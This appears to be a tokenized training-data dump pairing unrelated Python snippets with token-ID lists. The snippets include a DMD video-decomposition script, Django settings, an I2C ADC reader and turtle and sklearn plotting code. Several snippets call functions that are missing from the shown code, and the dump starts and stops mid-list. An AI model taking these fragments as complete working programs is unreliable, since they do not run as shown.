302,
25781,
13,
3866,
36948,
13,
3866,
41341,
1330,
3771,
41341,
628,
198,
361,
3180,
62,
26001,
62,
1677,
53,
4663,
1340,
10979,
25,
198,
220,
220,
220,
422,
302,
25781,
13,
21855,
13,
28764,
2867,
13,
21855,
62,
79,
17407,
273,
62,
48553,
1330,
357,
198,
220,
220,
220,
220,
220,
220,
220,
376,
65,
40277,
47,
17407,
273,
36918,
2848,
355,
27274,
47,
17407,
273,
36918,
2848,
11,
198,
220,
220,
220,
1267,
198,
17772,
25,
198,
220,
220,
220,
422,
302,
25781,
13,
28764,
2867,
13,
79,
17407,
273,
62,
48553,
1330,
27274,
47,
17407,
273,
36918,
2848,
628,
198,
4871,
8444,
8374,
40277,
7934,
32875,
7,
4164,
330,
31172,
28,
8081,
4592,
48526,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
7308,
1398,
329,
28810,
8674,
2010,
27098,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
2488,
39305,
13,
397,
8709,
24396,
628,
220,
220,
220,
825,
1382,
62,
31293,
62,
21412,
7,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
11,
198,
220,
220,
220,
220,
220,
220,
220,
8674,
25,
9104,
14881,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1181,
62,
11265,
1634,
62,
7890,
25,
14435,
1634,
6601,
11,
198,
220,
220,
220,
220,
220,
220,
220,
2223,
62,
30053,
62,
2340,
25,
7343,
58,
600,
4357,
198,
220,
220,
220,
1267,
4613,
28034,
13,
20471,
13,
26796,
25,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
16409,
257,
34868,
7391,
41568,
8265,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1181,
62,
3866,
41341,
796,
3771,
41341,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1181,
62,
11265,
1634,
62,
7890,
13,
67,
1072,
62,
11265,
1634,
62,
17143,
7307,
11,
779,
62,
46999,
28,
25101,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
8674,
62,
4480,
62,
3866,
41341,
796,
27274,
3152,
6719,
41341,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8674,
13,
36166,
62,
19849,
22446,
18206,
22784,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1181,
62,
3866,
41341,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
27274,
47,
17407,
273,
36918,
2848,
7,
11218,
62,
4480,
62,
3866,
41341,
11,
2223,
62,
30053,
62,
2340,
8,
198
] | 2.682081 | 519 |
show_process = False
iterations = 50
import turtle
if not show_process:
turtle.tracer(0)
turtle.colormode(255)
turtle.color((0, 150, 0))
turtle.penup()
turtle.goto(-330, 0)
turtle.pendown()
fern(iterations)
turtle.update()
turtle.exitonclick()
| [
12860,
62,
14681,
796,
10352,
201,
198,
2676,
602,
796,
2026,
201,
198,
201,
198,
201,
198,
11748,
28699,
201,
198,
361,
407,
905,
62,
14681,
25,
201,
198,
220,
220,
220,
28699,
13,
2213,
11736,
7,
15,
8,
201,
198,
201,
198,
201,
198,
83,
17964,
13,
4033,
579,
1098,
7,
13381,
8,
201,
198,
83,
17964,
13,
8043,
19510,
15,
11,
6640,
11,
657,
4008,
201,
198,
83,
17964,
13,
3617,
929,
3419,
201,
198,
83,
17964,
13,
70,
2069,
32590,
26073,
11,
657,
8,
201,
198,
83,
17964,
13,
37038,
593,
3419,
201,
198,
69,
1142,
7,
2676,
602,
8,
201,
198,
201,
198,
201,
198,
83,
17964,
13,
19119,
3419,
201,
198,
83,
17964,
13,
37023,
261,
12976,
3419,
201,
198
] | 2.184 | 125 |
# source: https://stackoverflow.com/a/30875830
from rest_framework.authentication import SessionAuthentication
| [
2,
2723,
25,
3740,
1378,
25558,
2502,
11125,
13,
785,
14,
64,
14,
21495,
38569,
1270,
198,
6738,
1334,
62,
30604,
13,
41299,
3299,
1330,
23575,
47649,
3299,
628
] | 3.862069 | 29 |
from .base_widget import *
from .mdt2json import *
| [
6738,
764,
8692,
62,
42655,
1330,
1635,
198,
6738,
764,
9132,
83,
17,
17752,
1330,
1635,
198
] | 3 | 17 |
import time
from sys import exit, version_info
try:
from smbus import SMBus
except ImportError:
if version_info[0] < 3:
exit("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus")
elif version_info[0] == 3:
exit("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus")
adc_available = True
address = 0x48
i2c = SMBus(i2c_bus_id())
REG_CONV = 0x00
REG_CFG = 0x01
samples_per_second_map = {128: 0x0000, 250: 0x0020, 490: 0x0040, 920: 0x0060, 1600: 0x0080, 2400: 0x00A0, 3300: 0x00C0}
channel_map = {0: 0x4000, 1: 0x5000, 2: 0x6000, 3: 0x7000}
programmable_gain_map = {6144: 0x0000, 4096: 0x0200, 2048: 0x0400, 1024: 0x0600, 512: 0x0800, 256: 0x0A00}
PGA_6_144V = 6144
PGA_4_096V = 4096
PGA_2_048V = 2048
PGA_1_024V = 1024
PGA_0_512V = 512
PGA_0_256V = 256
try:
read_se_adc()
except IOError:
adc_available = False
| [
11748,
640,
198,
6738,
25064,
1330,
8420,
11,
2196,
62,
10951,
198,
198,
28311,
25,
198,
220,
220,
220,
422,
895,
10885,
1330,
9447,
16286,
198,
16341,
17267,
12331,
25,
198,
220,
220,
220,
611,
2196,
62,
10951,
58,
15,
60,
1279,
513,
25,
198,
220,
220,
220,
220,
220,
220,
220,
8420,
7203,
1212,
5888,
4433,
21015,
12,
82,
2022,
385,
59,
77,
15798,
351,
25,
21061,
15409,
12,
1136,
2721,
21015,
12,
82,
2022,
385,
4943,
198,
220,
220,
220,
1288,
361,
2196,
62,
10951,
58,
15,
60,
6624,
513,
25,
198,
220,
220,
220,
220,
220,
220,
220,
8420,
7203,
1212,
5888,
4433,
21015,
18,
12,
82,
2022,
385,
59,
77,
15798,
351,
25,
21061,
15409,
12,
1136,
2721,
21015,
18,
12,
82,
2022,
385,
4943,
628,
198,
324,
66,
62,
15182,
796,
6407,
628,
198,
198,
21975,
796,
657,
87,
2780,
198,
72,
17,
66,
796,
9447,
16286,
7,
72,
17,
66,
62,
10885,
62,
312,
28955,
198,
198,
31553,
62,
10943,
53,
796,
657,
87,
405,
198,
31553,
62,
22495,
38,
796,
657,
87,
486,
198,
198,
82,
12629,
62,
525,
62,
12227,
62,
8899,
796,
1391,
12762,
25,
657,
87,
2388,
11,
8646,
25,
657,
87,
405,
1238,
11,
45601,
25,
657,
87,
405,
1821,
11,
47679,
25,
657,
87,
405,
1899,
11,
26143,
25,
657,
87,
405,
1795,
11,
48548,
25,
657,
87,
405,
32,
15,
11,
4747,
405,
25,
657,
87,
405,
34,
15,
92,
198,
17620,
62,
8899,
796,
1391,
15,
25,
657,
87,
27559,
11,
352,
25,
657,
87,
27641,
11,
362,
25,
657,
87,
43434,
11,
513,
25,
657,
87,
22,
830,
92,
198,
23065,
44102,
62,
48544,
62,
8899,
796,
1391,
21,
18444,
25,
657,
87,
2388,
11,
42479,
25,
657,
87,
44613,
11,
36117,
25,
657,
87,
3023,
405,
11,
28119,
25,
657,
87,
3312,
405,
11,
22243,
25,
657,
87,
2919,
405,
11,
17759,
25,
657,
87,
15,
32,
405,
92,
198,
198,
6968,
32,
62,
21,
62,
18444,
53,
796,
718,
18444,
198,
6968,
32,
62,
19,
62,
2931,
21,
53,
796,
42479,
198,
6968,
32,
62,
17,
62,
47202,
53,
796,
36117,
198,
6968,
32,
62,
16,
62,
40839,
53,
796,
28119,
198,
6968,
32,
62,
15,
62,
25836,
53,
796,
22243,
198,
6968,
32,
62,
15,
62,
11645,
53,
796,
17759,
628,
198,
198,
28311,
25,
198,
220,
220,
220,
1100,
62,
325,
62,
324,
66,
3419,
198,
16341,
24418,
12331,
25,
198,
220,
220,
220,
512,
66,
62,
15182,
796,
10352,
198
] | 2.197619 | 420 |
from typing import TYPE_CHECKING, TypedDict
if TYPE_CHECKING:
from .snowflake import Snowflake, SnowflakeList
__all__ = ("Category",)
| [
6738,
19720,
1330,
41876,
62,
50084,
2751,
11,
17134,
276,
35,
713,
198,
198,
361,
41876,
62,
50084,
2751,
25,
198,
220,
220,
220,
422,
764,
82,
2197,
47597,
1330,
7967,
47597,
11,
7967,
47597,
8053,
198,
198,
834,
439,
834,
796,
5855,
27313,
1600,
8,
628
] | 3 | 47 |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from myConvexHull import convex_hull, random_color
from myConvexHull.point_utils import X, Y
data = datasets.load_digits()
df = pd.DataFrame(data.data, columns=data.feature_names)
df['Target'] = pd.DataFrame(data.target)
plt.figure(figsize=(10, 6))
plt.title('Pixel [1, 3] vs Pixel [1, 4]')
plt.xlabel(data.feature_names[11])
plt.ylabel(data.feature_names[12])
for i in range(len(data.target_names)):
bucket = df[df['Target'] == i]
bucket = bucket.iloc[:, [11, 12]].values
hull = convex_hull(bucket)
color = random_color()
plt.scatter(bucket[:, 0], bucket[:, 1],
label=data.target_names[i], color=color)
hull = np.transpose(hull)
plt.plot(hull[X], hull[Y], color=color)
plt.legend()
plt.show()
| [
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
6738,
1341,
35720,
1330,
40522,
198,
6738,
616,
3103,
303,
87,
39,
724,
1330,
24748,
87,
62,
71,
724,
11,
4738,
62,
8043,
198,
6738,
616,
3103,
303,
87,
39,
724,
13,
4122,
62,
26791,
1330,
1395,
11,
575,
198,
198,
7890,
796,
40522,
13,
2220,
62,
12894,
896,
3419,
198,
7568,
796,
279,
67,
13,
6601,
19778,
7,
7890,
13,
7890,
11,
15180,
28,
7890,
13,
30053,
62,
14933,
8,
198,
7568,
17816,
21745,
20520,
796,
279,
67,
13,
6601,
19778,
7,
7890,
13,
16793,
8,
198,
489,
83,
13,
26875,
7,
5647,
7857,
16193,
940,
11,
718,
4008,
198,
489,
83,
13,
7839,
10786,
40809,
685,
16,
11,
513,
60,
3691,
11349,
685,
16,
11,
604,
60,
11537,
198,
489,
83,
13,
87,
18242,
7,
7890,
13,
30053,
62,
14933,
58,
1157,
12962,
198,
489,
83,
13,
2645,
9608,
7,
7890,
13,
30053,
62,
14933,
58,
1065,
12962,
198,
198,
1640,
1312,
287,
2837,
7,
11925,
7,
7890,
13,
16793,
62,
14933,
8,
2599,
198,
220,
220,
220,
19236,
796,
47764,
58,
7568,
17816,
21745,
20520,
6624,
1312,
60,
198,
220,
220,
220,
19236,
796,
19236,
13,
346,
420,
58,
45299,
685,
1157,
11,
1105,
60,
4083,
27160,
198,
220,
220,
220,
23644,
796,
24748,
87,
62,
71,
724,
7,
27041,
316,
8,
198,
220,
220,
220,
3124,
796,
4738,
62,
8043,
3419,
198,
220,
220,
220,
458,
83,
13,
1416,
1436,
7,
27041,
316,
58,
45299,
657,
4357,
19236,
58,
45299,
352,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6167,
28,
7890,
13,
16793,
62,
14933,
58,
72,
4357,
3124,
28,
8043,
8,
198,
220,
220,
220,
23644,
796,
45941,
13,
7645,
3455,
7,
71,
724,
8,
198,
220,
220,
220,
458,
83,
13,
29487,
7,
71,
724,
58,
55,
4357,
23644,
58,
56,
4357,
3124,
28,
8043,
8,
198,
198,
489,
83,
13,
1455,
437,
3419,
198,
489,
83,
13,
12860,
3419,
198
] | 2.396011 | 351 |
from random import sample
from time import sleep
colors = {"clean": "\033[m",
"red": "\033[31m",
"green": "\033[32m",
"yellow": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cian": "\033[36m"}
order = ["Breno", "Edu", "Miguel", "Lucas"]
print("{}Hmm...let me see{}".format(colors["cian"], colors["clean"]))
sleep(2)
print("The presentation order is {}{}{} "
.format(colors["yellow"], sample(order, k=4), colors["clean"]))
| [
6738,
4738,
1330,
6291,
198,
6738,
640,
1330,
3993,
198,
4033,
669,
796,
19779,
27773,
1298,
37082,
44427,
58,
76,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
445,
1298,
37082,
44427,
58,
3132,
76,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14809,
1298,
37082,
44427,
58,
2624,
76,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
36022,
1298,
37082,
44427,
58,
2091,
76,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17585,
1298,
37082,
44427,
58,
2682,
76,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14225,
1154,
1298,
37082,
44427,
58,
2327,
76,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
66,
666,
1298,
37082,
44427,
58,
2623,
76,
20662,
198,
2875,
796,
14631,
33,
918,
78,
1600,
366,
36,
646,
1600,
366,
44,
328,
2731,
1600,
366,
22946,
292,
8973,
198,
4798,
7203,
90,
92,
44217,
986,
1616,
502,
766,
90,
92,
1911,
18982,
7,
4033,
669,
14692,
66,
666,
33116,
7577,
14692,
27773,
8973,
4008,
198,
42832,
7,
17,
8,
198,
4798,
7203,
464,
10470,
1502,
318,
1391,
18477,
18477,
92,
366,
198,
220,
220,
220,
220,
220,
764,
18982,
7,
4033,
669,
14692,
36022,
33116,
6291,
7,
2875,
11,
479,
28,
19,
828,
7577,
14692,
27773,
8973,
4008,
198
] | 2.170306 | 229 |
# AP Ruymgaart DMD, main script
import numpy as np, time, sys, copy, matplotlib.pyplot as plt
from videoFunctions import *
from tensorFiles import *
from plottingFunctions import *
from dmd import *
#==== input (command line, from run.sh) ====
print('===================================== start DMD =================================\nInput:')
cmds = processCmdArgs(sys.argv)
for c in cmds: print('\t', c, cmds[c])
dt,nv,fname,ftype,images,f0,f1,outname,frPlot,binv = None,None,None,None,None,None,None,None,[],None
try:
nv = int(cmds['modes'])
dt,thresh = float(cmds['dt']), float(cmds['thresh'])
fname,ftype,outname = cmds['movie'], cmds['type'], cmds['outname']
f0,f1 = int(cmds['framestart']), int(cmds['framestop'])
szplotfr = cmds['plotframes'].split(',')
binv = cmds['inv'].lower() == 'true'
for h in szplotfr: frPlot.append(int(h))
except: print('** input error **'), exit()
if ftype == 'npz': images = tnsrFile2numpy(fname)
else: images = video2numpy(fname)
print('Movie-shape=', images.shape, 'dt=',dt, 'Nr modes=', nv, 'file-type=', ftype, 'frame', f0, 'to', f1)
print('Plot frames', frPlot, 'output file name', outname)
#==== DMD & dmdDynamics ====
X, szX, szY = flattenVideo(images, f0, f1)
[Phi,A,S,L,X1,X2,b] = DMD(X, szY, szX, nv)
Xdmd, T, omega = dmdDynamics(X1,L,b,Phi,nv,dt=dt)
#==== foreground/background ====
BG = abs(copy.copy(Xdmd.T))
FG = X[0:len(X)-1] - BG + 0.3 #- subtract low rank BG and add a grey background
print(np.min(FG), np.max(FG))
if False:
R = copy.copy(FG)
R[R > 0] = 0.0
FG = FG - R
BG = BG + R
for n in range(len(FG)): FG[n] = FG[n]/np.max(FG[n])
FG[FG < thresh] = 0.0 # thresholding (see paper)
if False: #- alternative attempt to select modes, not used now
omegaCut = 0.0
Xlr,Xhr = np.zeros(Xdmd.shape), np.zeros(Xdmd.shape)
for k in range(T.shape[1]):
LRt, HRt = dmdDynamicsLrVec(X1, L, b, Phi, k, dt, omegaCut=omegaCut)
Xlr[:,k] = LRt
Xhr[:,k] = HRt
L2 = np.abs(Xlr.T)
H2 = np.abs(Xhr.T)
lrMv = reshape2video(L2/np.max(L2), szY, szX)
np2movieFile(lrMv, outname+'_xlr', invert=binv)
hrMv = reshape2video(H2/np.max(H2), szY, szX)
np2movieFile(hrMv, outname+'_xhr', invert=binv)
#==== output ====
plotSV(np.log(np.abs(S) + 1), fname=outname+'_logSV.png')
plotSV(np.abs(omega), fname=outname+'_omega.png')
bgMv = reshape2video(BG, szY, szX)
bgMv = bgMv/np.max(bgMv)
np2movieFile(bgMv, outname+'_LR', invert=binv)
fgMv = reshape2video(FG, szY, szX)
np2movieFile(fgMv, outname+'_diff', invert=binv)
origMv = reshape2video(X[0:len(X)-1], szY, szX)
for fr in frPlot:
plotFrame(bgMv, fr, outname+'_LR_%d' % (fr))
plotFrame(fgMv, fr, outname+'_diff_%d' % (fr))
plotFrame(origMv, fr, outname+'_orig_%d' % (fr)) | [
2,
3486,
371,
4669,
76,
4908,
433,
360,
12740,
11,
1388,
4226,
198,
11748,
299,
32152,
355,
45941,
11,
640,
11,
25064,
11,
4866,
11,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
6738,
2008,
24629,
2733,
1330,
1635,
198,
6738,
11192,
273,
25876,
1330,
1635,
198,
6738,
29353,
24629,
2733,
1330,
1635,
198,
6738,
288,
9132,
1330,
1635,
198,
198,
2,
1421,
5128,
357,
21812,
1627,
11,
422,
1057,
13,
1477,
8,
796,
18604,
198,
4798,
10786,
10052,
1421,
28,
923,
360,
12740,
46111,
59,
77,
20560,
25,
11537,
198,
28758,
82,
796,
1429,
40109,
42035,
7,
17597,
13,
853,
85,
8,
198,
1640,
269,
287,
23991,
82,
25,
3601,
10786,
59,
83,
3256,
269,
11,
23991,
82,
58,
66,
12962,
198,
28664,
11,
48005,
11,
69,
3672,
11,
701,
2981,
11,
17566,
11,
69,
15,
11,
69,
16,
11,
448,
3672,
11,
8310,
43328,
11,
8800,
85,
796,
6045,
11,
14202,
11,
14202,
11,
14202,
11,
14202,
11,
14202,
11,
14202,
11,
14202,
17414,
4357,
14202,
198,
28311,
25,
197,
198,
197,
48005,
796,
493,
7,
28758,
82,
17816,
76,
4147,
6,
12962,
198,
197,
28664,
11,
400,
3447,
796,
12178,
7,
28758,
82,
17816,
28664,
20520,
828,
12178,
7,
28758,
82,
17816,
400,
3447,
6,
12962,
198,
197,
69,
3672,
11,
701,
2981,
11,
448,
3672,
796,
23991,
82,
17816,
41364,
6,
4357,
23991,
82,
17816,
4906,
6,
4357,
23991,
82,
17816,
448,
3672,
20520,
198,
197,
69,
15,
11,
69,
16,
796,
493,
7,
28758,
82,
17816,
19298,
395,
433,
20520,
828,
493,
7,
28758,
82,
17816,
19298,
395,
404,
6,
12962,
198,
197,
82,
89,
29487,
8310,
796,
23991,
82,
17816,
29487,
37805,
6,
4083,
35312,
7,
3256,
11537,
198,
197,
8800,
85,
796,
23991,
82,
17816,
16340,
6,
4083,
21037,
3419,
6624,
705,
7942,
6,
198,
197,
1640,
289,
287,
264,
89,
29487,
8310,
25,
1216,
43328,
13,
33295,
7,
600,
7,
71,
4008,
198,
16341,
25,
3601,
10786,
1174,
5128,
4049,
12429,
33809,
8420,
3419,
197,
198,
198,
361,
277,
4906,
6624,
705,
37659,
89,
10354,
4263,
796,
256,
5907,
81,
8979,
17,
77,
32152,
7,
69,
3672,
8,
220,
198,
17772,
25,
4263,
796,
2008,
17,
77,
32152,
7,
69,
3672,
8,
198,
4798,
10786,
25097,
12,
43358,
28,
3256,
4263,
13,
43358,
11,
705,
28664,
28,
3256,
28664,
11,
705,
45,
81,
12881,
28,
3256,
299,
85,
11,
705,
7753,
12,
4906,
28,
3256,
277,
4906,
11,
705,
14535,
3256,
277,
15,
11,
705,
1462,
3256,
277,
16,
8,
198,
4798,
10786,
43328,
13431,
3256,
1216,
43328,
11,
705,
22915,
2393,
1438,
3256,
503,
3672,
8,
198,
198,
2,
1421,
360,
12740,
1222,
288,
9132,
35,
4989,
873,
796,
18604,
198,
55,
11,
264,
89,
55,
11,
264,
89,
56,
796,
27172,
268,
10798,
7,
17566,
11,
277,
15,
11,
277,
16,
8,
198,
58,
2725,
72,
11,
32,
11,
50,
11,
43,
11,
55,
16,
11,
55,
17,
11,
65,
60,
796,
360,
12740,
7,
55,
11,
264,
89,
56,
11,
264,
89,
55,
11,
299,
85,
8,
198,
55,
67,
9132,
11,
309,
11,
37615,
796,
288,
9132,
35,
4989,
873,
7,
55,
16,
11,
43,
11,
65,
11,
2725,
72,
11,
48005,
11,
28664,
28,
28664,
8,
198,
198,
2,
1421,
36282,
14,
25249,
796,
18604,
198,
40469,
796,
2352,
7,
30073,
13,
30073,
7,
55,
67,
9132,
13,
51,
4008,
198,
30386,
796,
1395,
58,
15,
25,
11925,
7,
55,
13219,
16,
60,
532,
34839,
1343,
657,
13,
18,
1303,
12,
34128,
1877,
4279,
34839,
290,
751,
257,
13791,
4469,
198,
198,
4798,
7,
37659,
13,
1084,
7,
30386,
828,
45941,
13,
9806,
7,
30386,
4008,
198,
361,
10352,
25,
198,
197,
49,
796,
4866,
13,
30073,
7,
30386,
8,
198,
197,
49,
58,
49,
1875,
657,
60,
796,
657,
13,
15,
198,
197,
30386,
796,
25503,
532,
371,
198,
197,
40469,
796,
34839,
1343,
371,
198,
198,
1640,
299,
287,
2837,
7,
11925,
7,
30386,
8,
2599,
25503,
58,
77,
60,
796,
25503,
58,
77,
60,
14,
37659,
13,
9806,
7,
30386,
58,
77,
12962,
198,
30386,
58,
30386,
1279,
294,
3447,
60,
796,
657,
13,
15,
1303,
11387,
278,
357,
3826,
3348,
8,
198,
198,
361,
10352,
25,
1303,
12,
5559,
2230,
284,
2922,
12881,
11,
407,
973,
783,
198,
197,
462,
4908,
26254,
796,
657,
13,
15,
198,
197,
55,
14050,
11,
55,
11840,
796,
45941,
13,
9107,
418,
7,
55,
67,
9132,
13,
43358,
828,
45941,
13,
9107,
418,
7,
55,
67,
9132,
13,
43358,
8,
198,
197,
1640,
479,
287,
2837,
7,
51,
13,
43358,
58,
16,
60,
2599,
198,
197,
197,
35972,
83,
11,
15172,
83,
796,
288,
9132,
35,
4989,
873,
43,
81,
53,
721,
7,
55,
16,
11,
406,
11,
275,
11,
47256,
11,
479,
11,
288,
83,
11,
37615,
26254,
28,
462,
4908,
26254,
8,
197,
198,
197,
197,
55,
14050,
58,
45299,
74,
60,
796,
37491,
83,
220,
198,
197,
197,
55,
11840,
58,
45299,
74,
60,
796,
15172,
83,
220,
198,
197,
197,
198,
197,
43,
17,
796,
45941,
13,
8937,
7,
55,
14050,
13,
51,
8,
198,
197,
39,
17,
796,
45941,
13,
8937,
7,
55,
11840,
13,
51,
8,
198,
197,
14050,
44,
85,
796,
27179,
1758,
17,
15588,
7,
43,
17,
14,
37659,
13,
9806,
7,
43,
17,
828,
264,
89,
56,
11,
264,
89,
55,
8,
198,
197,
37659,
17,
41364,
8979,
7,
14050,
44,
85,
11,
503,
3672,
10,
6,
62,
87,
14050,
3256,
287,
1851,
28,
8800,
85,
8,
198,
197,
11840,
44,
85,
796,
27179,
1758,
17,
15588,
7,
39,
17,
14,
37659,
13,
9806,
7,
39,
17,
828,
264,
89,
56,
11,
264,
89,
55,
8,
198,
197,
37659,
17,
41364,
8979,
7,
11840,
44,
85,
11,
503,
3672,
10,
6,
62,
87,
11840,
3256,
287,
1851,
28,
8800,
85,
8,
198,
198,
2,
1421,
5072,
796,
18604,
198,
29487,
50,
53,
7,
37659,
13,
6404,
7,
37659,
13,
8937,
7,
50,
8,
1343,
352,
828,
277,
3672,
28,
448,
3672,
10,
6,
62,
6404,
50,
53,
13,
11134,
11537,
198,
29487,
50,
53,
7,
37659,
13,
8937,
7,
462,
4908,
828,
277,
3672,
28,
448,
3672,
10,
6,
62,
462,
4908,
13,
11134,
11537,
198,
35904,
44,
85,
796,
27179,
1758,
17,
15588,
7,
40469,
11,
264,
89,
56,
11,
264,
89,
55,
8,
198,
35904,
44,
85,
796,
275,
70,
44,
85,
14,
37659,
13,
9806,
7,
35904,
44,
85,
8,
198,
37659,
17,
41364,
8979,
7,
35904,
44,
85,
11,
503,
3672,
10,
6,
62,
35972,
3256,
287,
1851,
28,
8800,
85,
8,
198,
40616,
44,
85,
796,
27179,
1758,
17,
15588,
7,
30386,
11,
264,
89,
56,
11,
264,
89,
55,
8,
198,
37659,
17,
41364,
8979,
7,
40616,
44,
85,
11,
503,
3672,
10,
6,
62,
26069,
3256,
287,
1851,
28,
8800,
85,
8,
198,
11612,
44,
85,
796,
27179,
1758,
17,
15588,
7,
55,
58,
15,
25,
11925,
7,
55,
13219,
16,
4357,
264,
89,
56,
11,
264,
89,
55,
8,
198,
1640,
1216,
287,
1216,
43328,
25,
198,
197,
29487,
19778,
7,
35904,
44,
85,
11,
1216,
11,
503,
3672,
10,
6,
62,
35972,
62,
4,
67,
6,
4064,
357,
8310,
4008,
198,
197,
29487,
19778,
7,
40616,
44,
85,
11,
1216,
11,
503,
3672,
10,
6,
62,
26069,
62,
4,
67,
6,
4064,
357,
8310,
4008,
198,
197,
29487,
19778,
7,
11612,
44,
85,
11,
1216,
11,
503,
3672,
10,
6,
62,
11612,
62,
4,
67,
6,
4064,
357,
8310,
4008
] | 2.146049 | 1,253 |
from pathlib import Path
import environ
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('READ_DOT_ENV_FILE', default=True)
if READ_DOT_ENV_FILE:
env.read_env()
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = env('SECRET_KEY')
DEBUG = env.bool('DEBUG')
ALLOWED_HOSTS = ['127.0.0.1', 'payment-rounding.adrian-kalinin.dev', 'payment-rounding-api-5x85t.ondigitalocean.app']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'payment_rounding.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'payment_rounding.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
)
}
| [
6738,
3108,
8019,
1330,
10644,
198,
11748,
551,
2268,
628,
198,
24330,
796,
551,
2268,
13,
4834,
85,
3419,
198,
198,
15675,
62,
35,
2394,
62,
1677,
53,
62,
25664,
796,
17365,
13,
30388,
10786,
15675,
62,
35,
2394,
62,
1677,
53,
62,
25664,
3256,
4277,
28,
17821,
8,
198,
198,
361,
20832,
62,
35,
2394,
62,
1677,
53,
62,
25664,
25,
198,
220,
220,
220,
17365,
13,
961,
62,
24330,
3419,
628,
198,
33,
11159,
62,
34720,
796,
10644,
7,
834,
7753,
834,
737,
411,
6442,
22446,
8000,
13,
8000,
198,
198,
23683,
26087,
62,
20373,
796,
17365,
10786,
23683,
26087,
62,
20373,
11537,
198,
198,
30531,
796,
17365,
13,
30388,
10786,
30531,
11537,
198,
198,
7036,
3913,
1961,
62,
39,
10892,
50,
796,
37250,
16799,
13,
15,
13,
15,
13,
16,
3256,
705,
37301,
12,
744,
278,
13,
324,
4484,
12,
74,
14414,
259,
13,
7959,
3256,
705,
37301,
12,
744,
278,
12,
15042,
12,
20,
87,
5332,
83,
13,
623,
328,
1287,
78,
5829,
13,
1324,
20520,
628,
198,
38604,
7036,
1961,
62,
2969,
3705,
796,
685,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
28482,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
11299,
19199,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
82,
6202,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
37348,
1095,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
12708,
16624,
3256,
198,
220,
220,
220,
705,
2118,
62,
30604,
3256,
198,
220,
220,
220,
705,
15042,
3256,
198,
60,
198,
198,
44,
2389,
35,
2538,
33746,
796,
685,
198,
220,
220,
220,
705,
28241,
14208,
13,
27171,
1574,
13,
12961,
13,
24074,
34621,
1574,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
82,
6202,
13,
27171,
1574,
13,
36044,
34621,
1574,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
27171,
1574,
13,
11321,
13,
17227,
34621,
1574,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
27171,
1574,
13,
6359,
41871,
13,
34,
27891,
69,
7680,
34621,
1574,
3256,
198,
220,
220,
